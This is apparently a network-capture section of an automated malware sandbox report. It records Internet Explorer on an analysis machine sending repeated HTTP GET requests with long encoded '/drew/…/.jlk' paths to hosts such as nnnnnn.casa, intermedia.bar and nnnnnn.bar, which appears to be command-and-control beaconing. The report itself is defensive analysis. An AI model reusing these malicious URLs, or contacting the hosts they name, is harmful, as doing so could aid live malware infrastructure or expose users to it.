                  Location: http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 63 66 41 64 4d 67 6d 4b 6b 69 6e 2f 49 4b 67 35 6b 45 7a 55 63 37 4f 34 31 47 2f 31 61 4a 58 68 61 65 54 63 4a 63 4b 52 4c 48 5a 65 56 46 54 52 2f 59 45 53 72 48 63 35 36 6e 48 52 5a 56 6d 78 34 2f 74 59 78 50 30 6b 4e 74 33 4a 30 39 51 65 58 2f 69 67 64 56 74 78 50 4f 55 70 5f 32 42 4f 56 33 54 31 2f 6c 39 76 5a 75 30 58 77 63 2f 46 4d 5f 32 42 42 35 4d 61 72 41 45 4d 50 63 41 6a 42 31 71 2f 4d 5a 6a 59 66 76 63 5f 32 46 4e 6b 41 63 39 69 63 4a 38 2f 48 5a 6a 43 50 57 44 6f 50 65 77 4a 4e 64 4c 73 71 49 46 34 50 50 2f 6c 75 44 49 46 4d 64 55 64 4f 69 71 34 2f 36 4a 59 56 78 37 58 35 2f 54 63 70 6e 56 30 68 4e 30 55 78 73 61 30 62 4d 35 45 4c 4e 72 76 72 2f 78 6b 59 42 6d 77 47 30 6d 61 2f 48 5f 32 46 4b 4a 4c 67 51 32 4a 46 47 58 36 58 63 2f 62 46 4e 71 62 51 52 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk'>Found</a>.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.349812198.54.117.21880C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:22.248538971 CET1897OUTGET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.349814198.54.117.21180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:22.270560026 CET1898OUTGET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.349813198.54.117.21180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:22.431092024 CET2966OUTGET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.349815198.54.117.21180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:22.757133961 CET5712OUTGET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.34974631.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:31.905735016 CET1136OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.349819198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:24.126190901 CET10770OUTGET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.349817198.54.117.21080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:24.130305052 CET10770OUTGET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Connection: Keep-Alive
                  Host: www.nnnnnn.casa


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.34984731.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:51.879244089 CET12339OUTGET /drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7CusLE4kewLdgn0o2N/oqWX0BcSxplHN_2B/LanESZOKp7dQPeh/Bo8uTaavu_2Ft_2Fbr/wQ7_2Bk2J/05dRSkDLS9N7xl3W_2Bf/AbGuWE5_2Fe2HMgSOVJ/9yz_2BMUIlCumYQTU9_2FK/3J_2FJB7d5R8b/4SQYH3gS/rRcCSRSB5b0qKURrLfmKh6H/GM_2F3Wo_2/F.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.34984831.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.115874052 CET12341OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.34985031.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.129216909 CET12342OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.34985331.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.158545017 CET12343OUTGET /drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3wnTfM22OhIhFDrhX/abhGbeDg_2/F32j7cFeBDC9GyCao/m10xhdMb4CCa/7HwtF9C64_2/F3b31QlJIQy42X/zsnIbRG3JRJ596u8kc4vW/CJEx7Xa659BvZ2yV/10sCxMgGuLgu5f6/Z9JRI8lQTnPNjwZZMu/mc129Uq8I/WlhkxbiPfyst/snQ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.34984931.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.176908016 CET12344OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.34985131.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.189969063 CET12345OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.34985431.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.311357975 CET12346OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.34985631.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.318907976 CET12347OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.34974731.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:52:31.968349934 CET1136OUTGET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.34985531.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.377352953 CET12348OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.34985731.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.385299921 CET12349OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.34985831.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.509434938 CET12351OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.34986131.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.512000084 CET12351OUTGET /drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff_2/FStFCHj7v78d/fK9WUSOh8lR/URjb3oWdvJZZ0U/IcrNV5CQkhMYnhHpv3KL_/2BKPAmbWZn4Vm75I/zFUrSlkXbMXjO5q/LefQPk4V1F4MoJTGv7/t20qtY8qJ/V_2FyM_2F_2BVYVAgqn_/2FAbaIbtwkp7Opl2EpV/O0v8KX5IGR5NLbF_2Blou0/BwiZZ.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.34985931.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.576872110 CET12353OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.34986231.41.46.12080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:53:53.706053019 CET12354OUTGET /drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5seTAjCr_2BptR/zhdF_2B4iq_2F_2BdHZdbI/ppfIxjLZ1jFYb/jyraclx8/vY5o1N_2BBLJzcq8mbek0fq/sxBZO8XqCk/AZEFg4uupv5GBukaQ/chXIble8iRyF/2WTf0LlFxoi/1E61e67K_2BmUA/YOX2fReueqR9_2BbftFvZ/gzjKHMsB77w59NKXhfCT1/8O.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.349864162.255.119.17780C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 21, 2022 07:54:16.363537073 CET12356OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:16.797559977 CET12357OUTGET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.bar
                  Connection: Keep-Alive
                  Jan 21, 2022 07:54:18.937757015 CET12358INHTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:54:18 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 321
                  Connection: keep-alive
                  Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk
                  X-Served-By: Namecheap URL Forward
